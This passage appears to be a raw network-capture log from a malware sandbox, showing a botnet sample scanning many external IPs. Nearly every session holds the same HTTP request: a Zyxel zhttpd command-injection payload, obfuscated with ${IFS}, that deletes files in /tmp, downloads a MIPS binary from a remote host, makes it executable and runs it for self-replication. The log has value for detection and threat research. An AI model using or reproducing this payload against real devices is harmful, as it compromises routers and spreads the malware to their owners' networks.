                                          Jan 14, 2024 15:46:24.146159887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6256192.168.2.2355492133.237.0.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146179914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6257192.168.2.2340464119.160.112.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146240950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6258192.168.2.2352976209.50.38.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146275043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6259192.168.2.235182477.62.207.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146331072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6260192.168.2.234977884.19.138.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146399975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6261192.168.2.2337884135.15.157.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146435022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6262192.168.2.234539879.232.144.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146450043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6263192.168.2.235547451.96.105.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146469116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6264192.168.2.234566295.163.233.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146487951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6265192.168.2.2338708217.81.83.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146539927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6266192.168.2.23442562.128.146.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146574020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6267192.168.2.2333298170.249.86.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146610022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6268192.168.2.236068082.120.113.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146645069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6269192.168.2.2338810124.242.6.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146713018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6270192.168.2.235269259.251.102.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146724939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6271192.168.2.234099083.93.150.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146770954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6272192.168.2.2337282172.6.185.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146806955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6273192.168.2.2347556207.93.34.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146859884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6274192.168.2.2346860204.45.14.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146883011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6275192.168.2.234427461.121.152.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146929026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6276192.168.2.233421681.0.93.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146976948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6277192.168.2.2357732149.217.142.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.146996975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6278192.168.2.2343340142.234.53.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147063017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6279192.168.2.2348626205.158.164.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147119999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6280192.168.2.2356832134.25.163.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147145033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6281192.168.2.2348246163.211.54.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147167921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6282192.168.2.235261664.49.247.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147192001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6283192.168.2.234040292.199.217.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147223949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6284192.168.2.2348682199.78.180.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147253036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6285192.168.2.2346422153.248.44.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147280931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6286192.168.2.235051654.45.12.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147361040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6287192.168.2.2342198126.243.61.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147396088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6288192.168.2.2336610184.233.104.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147425890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6289192.168.2.234031886.88.202.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147460938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6290192.168.2.2333994190.231.255.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147485971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6291192.168.2.2360454166.89.236.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147536993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6292192.168.2.235688625.23.152.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147571087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6293192.168.2.2354188106.0.228.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147597075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6294192.168.2.2346028173.131.177.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147639036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6295192.168.2.2349956146.101.176.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147669077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6296192.168.2.234044664.243.31.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147707939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6297192.168.2.2360702131.250.163.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147721052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6298192.168.2.234498017.61.178.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147788048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6299192.168.2.2349774120.205.95.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147845030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6300192.168.2.2352682151.230.118.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147851944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6301192.168.2.2360102176.191.78.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147905111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6302192.168.2.2340024112.102.139.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.147922039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6303192.168.2.23558402.225.70.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148000002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6304192.168.2.2341696140.203.56.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148021936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6305192.168.2.234710436.141.9.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148045063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6306192.168.2.233426227.149.165.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148072004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6307192.168.2.2335456123.87.34.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148122072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6308192.168.2.2345520102.72.106.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148147106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6309192.168.2.233806852.201.106.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148215055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6310192.168.2.2348648184.129.168.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148247957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6311192.168.2.2333746124.236.126.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148304939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6312192.168.2.234624053.140.177.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148341894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6313192.168.2.2359398199.78.238.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148411989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6314192.168.2.234346092.232.151.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148442984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6315192.168.2.234329489.249.44.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148472071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6316192.168.2.2343650210.188.125.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148504972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6317192.168.2.2348260191.238.169.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148531914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6318192.168.2.2353592193.68.113.221443
                                          TimestampBytes transferredDirectionData
